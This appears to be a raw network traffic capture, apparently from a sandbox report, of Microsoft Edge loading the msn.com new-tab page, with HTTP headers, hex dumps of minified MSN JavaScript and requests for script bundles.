                                                                                                                                                                  Set-Cookie: USRLOC=; expires=Mon, 11 Jan 2027 06:54:29 GMT; domain=.msn.com; path=/; secure; samesite=none; httponly
                                                                                                                                                                  Set-Cookie: MUID=0136911D054E6BFC0E90846C04216AB7; expires=Thu, 05 Feb 2026 06:54:29 GMT; domain=.msn.com; path=/; secure; samesite=none
                                                                                                                                                                  Set-Cookie: MUIDB=0136911D054E6BFC0E90846C04216AB7; expires=Thu, 05 Feb 2026 06:54:29 GMT; path=/; httponly
                                                                                                                                                                  Set-Cookie: _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; domain=.msn.com; path=/; httponly
                                                                                                                                                                  Set-Cookie: _EDGE_V=1; expires=Thu, 05 Feb 2026 06:54:29 GMT; domain=.msn.com; path=/; httponly
                                                                                                                                                                  Access-Control-Allow-Methods: HEAD,GET,OPTIONS
                                                                                                                                                                  Content-Security-Policy: child-src 'self';connect-src 'self' *.mavideo.microsoft.com arc.msn.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn browser.events.data.msn.com browser.events.data.msn.cn browser.events.data.microsoftstart.com browser.events.data.microsoftstart.cn business.bing.com/api/ usgov.business.bing.com/api/ cdn.hubblecontent.osi.office.net copilotexplore.azurewebsites.net events-sandbox.data.msn.com events-sandbox.data.msn.cn events-sandbox.data.microsoftstart.com events-sandbox.data.microsoftstart.cn finance-services.msn.com https://*.sharepoint.com/_api/v2.0/ https://*.sharepoint-df.com/_api/v2.0/ https://*.sharepoint.com/_api/v2.1/ https://*.sharepoint-df.com/_api/v2.1/ https://bingretailmsndata.azureedge.net/msndata/ https://browser.pipe.aria.microsoft.com/Collector/ https://dev.virtualearth.net/REST/v1/Imagery/ https://dev.ditu.live.com/REST/v1/Imagery/ https://ecn.dev.virtualearth.net https://jsconfig.adsafeprotected.com https://g.bing.com https://msx.bing.com https://pet [TRUNCATED]
                                                                                                                                                                  X-Robots-Tag: noindex
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  X-XSS-Protection: 1
                                                                                                                                                                  X-UA-Compatible: IE=Edge;chrome=1
                                                                                                                                                                  x-fabric-cluster: pmeprodeus
                                                                                                                                                                  nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5}
                                                                                                                                                                  report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]},{"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://deff.nelreports.net/api/report"}]}
                                                                                                                                                                  Strict-Transport-Security: max-age=1209600; includeSubDomains; preload
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Prefers-Color-Scheme, Device-Memory, Downlink, ECT, RTT, Sec-CH-DPR
                                                                                                                                                                  X-Ceto-ref: 678215a5e7af4f58a9a47da360e264f5|AFD:F7B66E0F99774EE4994A9572D133A3C9|2025-01-11T06:54:29.225Z
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  X-MSEdge-Ref: Ref A: F7B66E0F99774EE4994A9572D133A3C9 Ref B: CHI30EDGE0213 Ref C: 2025-01-11T06:54:29Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:29 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2025-01-11 06:54:29 UTC698INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 64 69 72 3d 22 6c 74 72 22 20 3e 0d 0a 3c 68 65 61 64 20 64 61 74 61 2d 69 6e 66 6f 3d 22 66 3a 6d 73 6e 61 6c 6c 65 78 70 75 73 65 72 73 2c 70 72 67 2d 73 70 2d 6c 69 76 65 61 70 69 2c 70 72 67 2d 66 69 6e 2d 63 6f 6d 70 6f 66 2c 70 72 67 2d 66 69 6e 2d 68 70 6f 66 6c 69 6f 2c 70 72 67 2d 66 69 6e 2d 70 6f 66 6c 69 6f 2c 70 72 67 2d 31 73 77 2d 63 63 2d 63 61 6c 66 65 65 64 69 63 2c 61 64 73 2d 63 66 76 34 2c 31 73 2d 70 6e 70 66 65 64 6c 6f 63 63 66 2c 70 6e 70 77 78 65 78 70 69 72 65 33 36 30 2c 62 69 6e 67 5f 76 32 5f 73 63 6f 70 65 2c 70 72 67 2d 31 73 77 2d 73 61 63 66 78 32 74 63 2c 70 72 67 2d 31 73 77 2d 73 61 2d 63 61 70 63 6f 6e 66 33 74
                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en-us" dir="ltr" ><head data-info="f:msnallexpusers,prg-sp-liveapi,prg-fin-compof,prg-fin-hpoflio,prg-fin-poflio,prg-1sw-cc-calfeedic,ads-cfv4,1s-pnpfedloccf,pnpwxexpire360,bing_v2_scope,prg-1sw-sacfx2tc,prg-1sw-sa-capconf3t
                                                                                                                                                                  2025-01-11 06:54:29 UTC436INData Raw: 70 6f 2d 70 72 67 32 2d 65 76 6c 63 66 70 63 61 70 32 2c 31 73 2d 77 70 6f 2d 70 72 67 32 2d 65 76 6c 63 67 64 64 6e 2c 31 73 2d 77 70 6f 2d 70 72 67 32 2d 65 76 6c 63 74 33 2c 70 72 67 2d 31 73 77 2d 62 67 2d 70 32 2c 70 72 67 2d 31 73 77 2d 63 6d 65 76 6c 74 2c 70 72 67 2d 70 32 2d 74 66 2d 62 64 67 70 76 2d 61 69 2c 70 72 67 2d 70 72 32 2d 66 69 65 70 6c 63 2c 70 72 67 2d 70 72 32 2d 74 72 66 2d 72 68 69 67 68 69 6d 70 2c 70 72 67 2d 70 72 32 2d 77 78 65 76 6f 6c 6e 6f 74 69 2c 70 72 67 2d 75 70 73 61 69 70 2d 77 31 2d 74 2c 31 73 2d 72 70 73 73 65 63 61 75 74 68 74 2c 6a 6a 5f 66 61 63 5f 63 2c 70 72 67 2d 63 67 70 32 2d 68 6f 74 74 32 2c 31 73 2d 63 67 2d 70 32 68 6f 74 33 2c 70 72 67 2d 31 73 77 2d 64 61 69 6c 79 70 6f 70 2c 70 72 67 2d 31 73 77 2d
                                                                                                                                                                  Data Ascii: po-prg2-evlcfpcap2,1s-wpo-prg2-evlcgddn,1s-wpo-prg2-evlct3,prg-1sw-bg-p2,prg-1sw-cmevlt,prg-p2-tf-bdgpv-ai,prg-pr2-fieplc,prg-pr2-trf-rhighimp,prg-pr2-wxevolnoti,prg-upsaip-w1-t,1s-rpssecautht,jj_fac_c,prg-cgp2-hott2,1s-cg-p2hot3,prg-1sw-dailypop,prg-1sw-
                                                                                                                                                                  2025-01-11 06:54:29 UTC4096INData Raw: 2c 31 73 2d 73 68 70 2d 72 63 2d 74 65 2d 63 72 63 66 61 32 2c 31 73 2d 73 68 70 2d 72 63 2d 74 2d 74 32 69 76 31 2c 31 73 2d 73 68 70 2d 72 63 2d 74 74 2d 74 32 69 76 31 2c 70 72 67 2d 73 68 2d 66 72 6e 72 63 2c 70 72 67 2d 77 78 2d 64 68 67 72 64 2c 70 72 67 2d 73 68 2d 64 65 61 6c 73 64 61 79 70 64 70 2c 70 72 67 2d 73 68 2d 72 6d 69 74 6d 6c 6e 6b 2d 63 2c 6e 6f 70 69 6e 67 6c 61 6e 63 65 63 61 72 64 69 74 2c 70 72 67 2d 63 67 2d 69 6e 67 61 6d 65 73 2d 78 6e 2d 61 64 73 2c 70 72 67 2d 63 67 2d 69 6e 2d 67 6d 2d 78 6e 2d 61 64 73 2c 70 72 67 2d 31 73 2d 77 6f 72 6b 69 64 2c 31 73 2d 6d 78 72 2d 6e 74 70 70 61 67 65 2d 63 2c 31 73 2d 6d 78 72 2d 77 69 6e 66 65 65 64 2c 31 73 2d 74 65 6d 70 2d 77 69 64 2d 74 2c 70 72 67 2d 31 73 2d 74 77 69 64 2c 61 64
                                                                                                                                                                  Data Ascii: ,1s-shp-rc-te-crcfa2,1s-shp-rc-t-t2iv1,1s-shp-rc-tt-t2iv1,prg-sh-frnrc,prg-wx-dhgrd,prg-sh-dealsdaypdp,prg-sh-rmitmlnk-c,nopinglancecardit,prg-cg-ingames-xn-ads,prg-cg-in-gm-xn-ads,prg-1s-workid,1s-mxr-ntppage-c,1s-mxr-winfeed,1s-temp-wid-t,prg-1s-twid,ad
                                                                                                                                                                  2025-01-11 06:54:29 UTC4096INData Raw: 62 69 6c 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 66 61 6c 73 65 26 71 75 6f 74 3b 7d 2c 20 26 71 75 6f 74 3b 64 6f 6d 61 69 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 6f 63 69 64 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 4d 4e 48 50 5f 55 35 33 31 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 72 65 71 75 65 73 74 54 72 61 69 6c 49 6e 66 6f 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 66 6c 69 67 68 74 56 65 72 73 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 35 33 35 30 35 32 33 37 26 71 75 6f 74 3b 7d 2c 20 26 71 75 6f 74 3b 64 65 74 65 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 69 70 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 31 38 35 2e 32 34 36 2e 32 30 39 2e 30 26 71 75 6f
                                                                                                                                                                  Data Ascii: bile&quot;:&quot;false&quot;}, &quot;domain&quot;:&quot;ntp.msn.com&quot;, &quot;ocid&quot;:&quot;MNHP_U531&quot;, &quot;requestTrailInfo&quot;:{&quot;flightVersion&quot;:&quot;53505237&quot;}, &quot;detection&quot;:{&quot;ip&quot;:&quot;185.246.209.0&quo
                                                                                                                                                                  2025-01-11 06:54:29 UTC4096INData Raw: 29 2c 31 30 30 29 7d 29 29 7d 29 29 7d 7d 7d 28 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6e 26 26 76 6f 69 64 20 30 21 3d 3d 6e 2e 74 75 29 7b 63 6f 6e 73 74 20 65 3d 6e 2e 74 75 3b 6e 2e 74 75 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 65 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 29 72 65 74 75 72 6e 20 65 3b 63 6f 6e 73 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 69 6e 66 6f 22 29 3b 69 66 28 21 28 74 2e 69 6e 64 65 78 4f 66 28 22 6e 74 70 2d 61 66 64 68 33 74 22 29 3e 3d 30 7c 7c 74 2e 69
                                                                                                                                                                  Data Ascii: ),100)}))}))}}}(),function(){if(void 0!==n&&void 0!==n.tu){const e=n.tu;n.tu=function(t){return e(function(e){if("string"!=typeof e||"undefined"==typeof document)return e;const t=document.head.getAttribute("data-info");if(!(t.indexOf("ntp-afdh3t")>=0||t.i
                                                                                                                                                                  2025-01-11 06:54:29 UTC4096INData Raw: 29 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 29 7b 63 6f 6e 73 74 7b 70 63 73 49 6e 66 6f 3a 74 2c 70 61 67 65 47 65 6e 54 69 6d 65 3a 6e 7d 3d 65 2c 6f 3d 6e 65 77 20 44 61 74 65 28 6e 29 2e 67 65 74 54 69 6d 65 28 29 2c 69 3d 21 74 7c 7c 5b 22 70 72 6f 64 22 2c 22 70 72 6f 64 2d 73 73 72 22 2c 22 70 72 6f 64 2d 73 73 72 6e 74 70 22 5d 2e 69 6e 63 6c 75 64 65 73 28 74 2e 65 6e 76 29 3b 46 3d 69 3f 22 62 72 6f 77 73 65 72 2e 65 76 65 6e 74 73 2e 64 61 74 61 2e 6d 73 6e 2e 63 6f 6d 22 3a 22 65 76 65 6e 74 73 2d 73 61 6e 64 62 6f 78 2e 64 61 74 61 2e 6d 73 6e 2e 63 6f 6d 22 3b 72 65 74 75 72 6e 7b 63 6f 72 73 3a 22 74 72 75 65 22 2c 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6a 73 6f 6e 2d 73 74
                                                                                                                                                                  Data Ascii: ),p=function(e){if(e){const{pcsInfo:t,pageGenTime:n}=e,o=new Date(n).getTime(),i=!t||["prod","prod-ssr","prod-ssrntp"].includes(t.env);F=i?"browser.events.data.msn.com":"events-sandbox.data.msn.com";return{cors:"true","content-type":"application/x-json-st
                                                                                                                                                                  2025-01-11 06:54:29 UTC4096INData Raw: 6f 77 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 56 7c 7c 28 56 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 77 69 6e 64 6f 77 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 29 3b 72 65 74 75 72 6e 20 56 7d 63 6f 6e 73 74 20 4b 3d 32 32 33 33 30 30 2c 7a 3d 32 32 33 33 30 31 3b 66 75 6e 63 74 69 6f 6e 20 58 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 6f 28 74 29 3b 69 66 28 6e 29 7b 63 6f 6e 73 74 20 74 3d 6e 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 65 29 2c 6f 3d 74 26 26 74 2e 74 6f 53 74 72 69 6e 67 28 29 3b 72 65 74 75 72 6e 20 74 26 26 22 61 62 6f 75
                                                                                                                                                                  Data Ascii: ow)||void 0===e?void 0:e.location.search);V||(V=new URLSearchParams(null===(t=window)||void 0===t?void 0:t.location.search));return V}const K=223300,z=223301;function X(e,t){const n=o(t);if(n){const t=n.createScriptURL(e),o=t&&t.toString();return t&&"abou
                                                                                                                                                                  2025-01-11 06:54:29 UTC4096INData Raw: 69 72 65 63 74 22 2c 22 77 69 6e 70 31 74 61 73 6b 62 61 72 64 69 72 65 63 74 65 6e 74 22 2c 22 77 69 6e 70 31 74 61 73 6b 62 61 72 65 6e 74 22 2c 22 77 69 6e 70 32 6a 75 6e 74 61 73 6b 62 61 72 22 2c 22 77 69 6e 70 32 6a 75 6e 74 61 73 6b 62 61 72 65 6e 74 22 2c 22 77 69 6e 70 32 22 2c 22 77 69 6e 70 32 65 6e 74 22 2c 22 77 69 6e 70 32 66 70 22 2c 22 77 69 6e 70 32 66 70 65 6e 74 22 2c 22 77 69 6e 70 32 66 70 74 61 73 6b 62 61 72 22 2c 22 77 69 6e 70 32 66 70 74 61 73 6b 62 61 72 65 6e 74 22 2c 22 77 69 6e 70 32 66 70 74 61 73 6b 62 61 72 68 6f 76 65 72 22 2c 22 77 69 6e 70 32 66 70 74 61 73 6b 62 61 72 68 6f 76 65 72 65 6e 74 22 2c 22 77 69 6e 70 32 77 69 64 67 65 74 22 2c 22 77 69 6e 70 32 77 69 64 67 65 74 65 6e 74 22 5d 29 3b 63 6f 6e 73 74 20 41 65
                                                                                                                                                                  Data Ascii: irect","winp1taskbardirectent","winp1taskbarent","winp2juntaskbar","winp2juntaskbarent","winp2","winp2ent","winp2fp","winp2fpent","winp2fptaskbar","winp2fptaskbarent","winp2fptaskbarhover","winp2fptaskbarhoverent","winp2widget","winp2widgetent"]);const Ae
                                                                                                                                                                  2025-01-11 06:54:29 UTC4096INData Raw: 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 6a 65 28 29 2c 74 3d 21 47 65 28 22 70 72 67 2d 6e 6f 72 65 64 69 72 65 63 74 22 29 26 26 65 26 26 22 31 22 3d 3d 3d 65 2e 67 65 74 49 74 65 6d 28 59 65 29 26 26 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 64 61 74 61 73 65 74 2e 63 6c 69 65 6e 74 53 65 74 74 69 6e 67 73 7c 7c 22 22 2c 7b 62 72 6f 77 73 65 72 3a 74 7d 3d 61 65 28 65 29 7c 7c 7b 7d 2c 7b 62 72 6f 77 73 65 72 54 79 70 65 3a 6e 3d 22 22 7d 3d 74 7c 7c 7b 7d 3b 72 65 74 75 72 6e 21 21 2f 73 61 66 61 72 69 2f 69 2e 74 65 73 74 28 6e 29 7d 28 29 3b 72 65 74 75 72 6e 20 74 7d 29 29 3b 63 6f 6e 73 74 20 69 74 3d 75 28 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 6a 65 28 29 3b 72 65 74 75 72 6e 20 65 26 26 22
                                                                                                                                                                  Data Ascii: )=>{const e=je(),t=!Ge("prg-noredirect")&&e&&"1"===e.getItem(Ye)&&function(){const e=document.head.dataset.clientSettings||"",{browser:t}=ae(e)||{},{browserType:n=""}=t||{};return!!/safari/i.test(n)}();return t}));const it=u((()=>{const e=je();return e&&"
                                                                                                                                                                  2025-01-11 06:54:29 UTC4096INData Raw: 2b 74 68 69 73 2e 71 73 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 22 61 64 73 52 65 66 65 72 65 72 22 29 2b 74 68 69 73 2e 71 73 28 6e 75 6c 6c 3d 3d 3d 28 65 3d 64 28 29 3f 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 3a 74 65 28 29 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 74 6f 53 74 72 69 6e 67 28 29 2c 22 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 22 29 7d 71 73 46 72 6f 6d 53 65 72 76 69 63 65 57 6f 72 6b 65 72 28 29 7b 69 66 28 21 6e 61 76 69 67 61 74 6f 72 2e 73 65 72 76 69 63 65 57 6f 72 6b 65 72 7c 7c 21 6e 61 76 69 67 61 74 6f 72 2e 73 65 72 76 69 63 65 57
                                                                                                                                                                  Data Ascii: +this.qs(encodeURIComponent(window.location.href),"adsReferer")+this.qs(null===(e=d()?window.devicePixelRatio:te().devicePixelRatio)||void 0===e?void 0:e.toString(),"devicePixelRatio")}qsFromServiceWorker(){if(!navigator.serviceWorker||!navigator.serviceW


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  1192.168.11.2058637204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:29 UTC1226OUTGET /bundles/v1/edgeChromium/latest/SSR-extension.489618fee28203b75117.js HTTP/1.1
                                                                                                                                                                  Host: ntp.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  Device-Memory: 8
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  sec-ch-ua-model:
                                                                                                                                                                  rtt: 100
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                  sec-ch-ua-full-version: "94.0.992.31"
                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                  downlink: 1.5
                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                  ect: 4g
                                                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                  Referer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; MUIDB=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1
                                                                                                                                                                  2025-01-11 06:54:29 UTC1447INHTTP/1.1 200 OK
                                                                                                                                                                  Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                  Content-Length: 38171
                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                  Content-MD5: QtoymDLEcWsIYyTkYMRfnA==
                                                                                                                                                                  Last-Modified: Mon, 06 Jan 2025 21:28:59 GMT
                                                                                                                                                                  ETag: 0x8DD2E99220056FE
                                                                                                                                                                  Vary: Origin
                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                  x-ms-request-id: 6dc0b040-f01e-0098-6982-60d20e000000
                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                  Akamai-Request-BC: [a=23.218.248.208,b=77963547,c=g,n=US_IL_MOUNTPROSPECT,o=20940]
                                                                                                                                                                  Server-Timing: clientrtt; dur=4, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0
                                                                                                                                                                  Akamai-Cache-Status: Hit from child
                                                                                                                                                                  Akamai-Server-IP: 23.218.248.208
                                                                                                                                                                  Akamai-Request-ID: 4a5a11b
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                  nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                  Akamai-GRN: 0.d0f8da17.1736523012.4a5a11b
                                                                                                                                                                  X-CID: 7
                                                                                                                                                                  X-CCC: US
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: E13EAEDB8C404979B701ACCDB2EB02D8 Ref B: CHI30EDGE0318 Ref C: 2025-01-11T06:54:29Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:29 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2025-01-11 06:54:29 UTC14937INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 7d 3b 6c 65 74 20 74 2c 6e 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 69 66 28 6e 29 72 65 74 75 72 6e 20 6e 3b 63 6f 6e 73 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 69 6e 66 6f 22 29 3b 72 65 74 75 72 6e 20 6e 3d 28 28 2f 66 3a 5c 73 2a 28 5b 5e 3b 5d 2b 29 2f 69 2e 65 78 65 63 28 65 29 7c 7c 7b 7d 29 5b 31 5d 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 7d 65 2e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 29 72 65 74 75 72 6e 20 67 6c 6f 62 61 6c 54 68 69 73 3b 74 72 79 7b 72 65 74 75 72 6e
                                                                                                                                                                  Data Ascii: !function(){"use strict";var e={};let t,n;function o(){if(n)return n;const e=document.head.getAttribute("data-info");return n=((/f:\s*([^;]+)/i.exec(e)||{})[1]||"").toLowerCase(),n}e.g=function(){if("object"==typeof globalThis)return globalThis;try{return
                                                                                                                                                                  2025-01-11 06:54:29 UTC16384INData Raw: 72 65 66 65 72 65 72 2c 74 68 69 73 2e 75 73 65 72 41 67 65 6e 74 3d 65 2e 75 73 65 72 41 67 65 6e 74 2c 74 68 69 73 2e 63 6c 69 65 6e 74 44 61 74 61 3d 65 2e 63 6c 69 65 6e 74 44 61 74 61 2c 74 68 69 73 2e 6f 6e 65 53 65 72 76 69 63 65 48 65 61 64 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 72 79 7b 69 66 28 65 29 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 28 65 2e 6f 6e 65 53 65 72 76 69 63 65 48 65 61 64 65 72 73 29 7c 7c 7b 7d 2c 74 68 69 73 2e 69 73 50 73 73 72 4d 6f 64 65 3d 74 2c 74 29 7b 63 6f 6e 73 74 20 65 3d 77 65 28 22 4f 53 41 54 45 22 2c 74 68 69 73 2e 63 6f 6f 6b 69 65 29 2c 74 3d 21 21 65 26 26 22 31 22 3d 3d 3d 65 2c 6e 3d 77 65 28 22 4f 53 41 54 22 2c 74 68 69 73 2e 63 6f 6f 6b
                                                                                                                                                                  Data Ascii: referer,this.userAgent=e.userAgent,this.clientData=e.clientData,this.oneServiceHeaders=function(e){try{if(e)return JSON.parse(e)}catch(e){}}(e.oneServiceHeaders)||{},this.isPssrMode=t,t){const e=we("OSATE",this.cookie),t=!!e&&"1"===e,n=we("OSAT",this.cook
                                                                                                                                                                  2025-01-11 06:54:29 UTC6850INData Raw: 6c 3d 3d 3d 28 6d 3d 6d 2e 73 68 61 64 6f 77 52 6f 6f 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6d 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6d 3d 6d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 63 73 2d 63 61 72 64 22 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6d 3f 76 6f 69 64 20 30 3a 6d 2e 6f 75 74 65 72 48 54 4d 4c 29 7c 7c 22 22 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 5f 28 22 41 64 20 72 65 6e 64 65 72 20 64 6f 65 73 6e 27 74 20 6d 61 74 63 68 20 73 73 72 20 61 64 20 64 61 74 61 22 2c 32 30 31 39 33 2c 7b 72 65 6e 64 65 72 65 64 43 61 72 64 54 61 67 73 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 73 29 2c 61 64 44 61 74 61 49 64 3a 65 2e 69 64 2c 72 65 6e 64 65 72 65 64 49 64 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 7d 29 7d 7d 77 69 6e 64 6f 77 2e
                                                                                                                                                                  Data Ascii: l===(m=m.shadowRoot)||void 0===m||null===(m=m.querySelector("cs-card"))||void 0===m?void 0:m.outerHTML)||"";return void _("Ad render doesn't match ssr ad data",20193,{renderedCardTags:JSON.stringify(s),adDataId:e.id,renderedId:JSON.stringify(a)})}}window.


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  2192.168.11.2052413204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:29 UTC1201OUTGET /bundles/v1/edgeChromium/latest/web-worker.059504d3b28965aa7c6d.js HTTP/1.1
                                                                                                                                                                  Host: ntp.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  Device-Memory: 8
                                                                                                                                                                  sec-ch-ua-model:
                                                                                                                                                                  rtt: 100
                                                                                                                                                                  sec-ch-ua-mobile: ?0
